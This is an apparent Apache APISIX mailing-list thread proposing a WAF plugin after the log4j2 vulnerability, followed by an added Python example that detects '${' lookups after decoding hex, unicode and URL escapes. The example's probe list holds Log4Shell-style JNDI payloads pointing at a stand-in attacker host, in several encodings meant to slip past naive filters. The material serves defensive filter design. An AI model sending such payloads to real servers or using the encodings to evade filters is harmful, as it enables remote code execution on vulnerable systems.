Hi,

> Apache APISIX can add a general WAF plug-in to solve similar security problems

I support adding Security Plugins to prevent common vulnerabilities and then fulfill the Gateway abilities.
BTW, for the specific log4j2 issue, we should also pay attention to more encoding algorithms, e.g. Hex, Unicode. Because if we use some keywords like `${` to check requests, and the hacker converts it to `"\x24\u007b"`, it may bypass the WAF check :)

Best Regards!
@ Zhiyuan Ju <https://github.com/juzhiyuan>

Ming Wen <wenm...@apache.org> wrote on Fri, Dec 17, 2021 at 09:52:

> hello, community,
> Apache APISIX does not yet have a WAF plug-in, so when encountering a
> security vulnerability in log4j2, users of Apache APISIX need to write
> their own plug-ins.
>
> In my opinion, Apache APISIX can add a general WAF plug-in to solve
> similar security problems. We can deal with HTTP header, URI args, request
> body (this needs to be cautious and affects performance).
>
> What do you think?
>
> Thanks,
> Ming Wen, Apache APISIX PMC Chair
> Twitter: _WenMing
>
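As an added example that is not part of this thread and not APISIX's own code, the following Python shows the encoding bypass the reply warns about: a literal `${` match beside a check that first decodes percent-encoding, `\xHH` and `\uHHHH` escapes to a fixed point. It is plain Python rather than an APISIX Lua plugin; the probe strings, the `attacker.example` host and the header and argument names are constructed for the demo.

```python
"""Keyword WAF check for `${` with and without decoding (added example, not APISIX code).

Shows why a literal `${` match is bypassed by hex/unicode/URL escapes and how a
check that decodes the value to a fixed point before matching closes that gap.
All sample inputs below are constructed for the demo.
"""
import re
from urllib.parse import unquote

NEEDLE = "${"          # the raw lookup prefix a log4j2-style WAF rule looks for
MAX_DECODE_ROUNDS = 5  # bound the loop so stacked encodings cannot stall the check

_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")   # \x24   -> '$'
_UNI_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")   # \u007b -> '{'


def naive_check(value: str) -> bool:
    """Literal substring match only; this is the check the reply says is bypassable."""
    return NEEDLE in value


def decode_once(value: str) -> str:
    """Apply one round of the decodings an attacker may stack on top of each other."""
    value = unquote(value)  # %24%7B -> ${ ; percent-encoding can also hide the backslashes
    value = _HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value)
    value = _UNI_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value)
    return value


def normalize(value: str) -> str:
    """Decode until the value stops changing, or the round limit is reached.

    Stopping at a fixed point is what defeats double encoding such as %2524%257B.
    When the limit is hit the partially decoded value is still returned; a stricter
    policy could reject anything that is still changing after MAX_DECODE_ROUNDS.
    """
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = decode_once(value)
        if decoded == value:
            break
        value = decoded
    return value


def normalized_check(value: str) -> bool:
    """Match the keyword against the decoded form of the value."""
    return NEEDLE in normalize(value)


def scan_request(headers: dict, uri_args: dict) -> list:
    """Return (location, name) for each header or URI arg containing `${` after decoding.

    Covers the scope proposed in the thread (HTTP headers and URI args); the request
    body is left out here because of the performance caveat raised in the thread.
    """
    hits = []
    for name, value in headers.items():
        if normalized_check(str(value)):
            hits.append(("header", name))
    for name, value in uri_args.items():
        if normalized_check(str(value)):
            hits.append(("arg", name))
    return hits


# Constructed probes: the same lookup written five ways, plus a benign value.
PROBES = {
    "plain":      "${jndi:ldap://attacker.example/x}",
    "hex":        "\\x24\\x7bjndi:ldap://attacker.example/x}",
    "hex+uni":    "\\x24\\u007bjndi:ldap://attacker.example/x}",  # the mix from the reply
    "url":        "%24%7Bjndi:ldap://attacker.example/x}",
    "double_url": "%2524%257Bjndi:ldap://attacker.example/x}",
    "benign":     "Mozilla/5.0 (X11; Linux x86_64)",
}

if __name__ == "__main__":
    for label, probe in PROBES.items():
        print(f"{label:>10}: naive={naive_check(probe)!s:<5} normalized={normalized_check(probe)}")
    print(scan_request({"User-Agent": PROBES["hex+uni"], "Host": "api.example"},
                       {"q": PROBES["double_url"], "page": "2"}))
```

The naive check flags only the plain probe; the normalizing check flags all five encoded forms and leaves the benign value alone. Inside APISIX the same logic would sit in a plugin's access phase over `ngx.req.get_headers()` and `ngx.req.get_uri_args()`. Note that decoding covers only the escape schemes listed here; any other scheme needs its own decode step, and the round limit is what keeps the per-request CPU cost bounded.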